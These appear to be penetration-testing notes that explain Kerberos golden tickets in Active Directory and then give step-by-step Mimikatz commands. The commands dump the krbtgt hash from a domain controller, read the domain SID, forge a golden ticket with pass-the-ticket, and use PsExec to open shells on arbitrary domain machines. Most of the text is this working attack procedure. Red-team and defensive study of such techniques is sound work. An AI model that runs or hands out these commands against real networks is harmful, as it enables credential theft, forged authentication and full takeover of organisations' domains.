- TGTs are encrypted using the hash of the krbtgt user.
- If the hash of krbtgt could be acquired one could create custom TGTs, a.k.a. golden tickets.
- Golden tickets gives permission to access the entire domain's resources
- E.g. one could create a ticket stating that any user is a member of the Domain Admins group.
- To get the krbtgt hash a Domain Admin user is required, or if the domain controller itself is compromised.
- The ticket itself can be created from anywhere without privileges.
Generate Golden Ticket Locally Using Mimikatz:
- Get hold of krbtgt hash, e.g. by compromising DC and dumping NTLM with "lsadump::lsa /patch".
- Enumerate domain SID:
whoami /user
- Result: corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105
- Purge all existing kerberos tickets in Mimikatz:
kerberos::purge
- Generate ticket:
kerberos::golden /user:<golden-ticket-username> /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-hash> /ptt
- Launch new command prompt:
misc::cmd
- Use PsExec to launch shells to arbitrary domain machines:
PsExec.exe \\<host> cmd.exe
- Important to use hostname instead of ip since we want to authenticate with kerberos.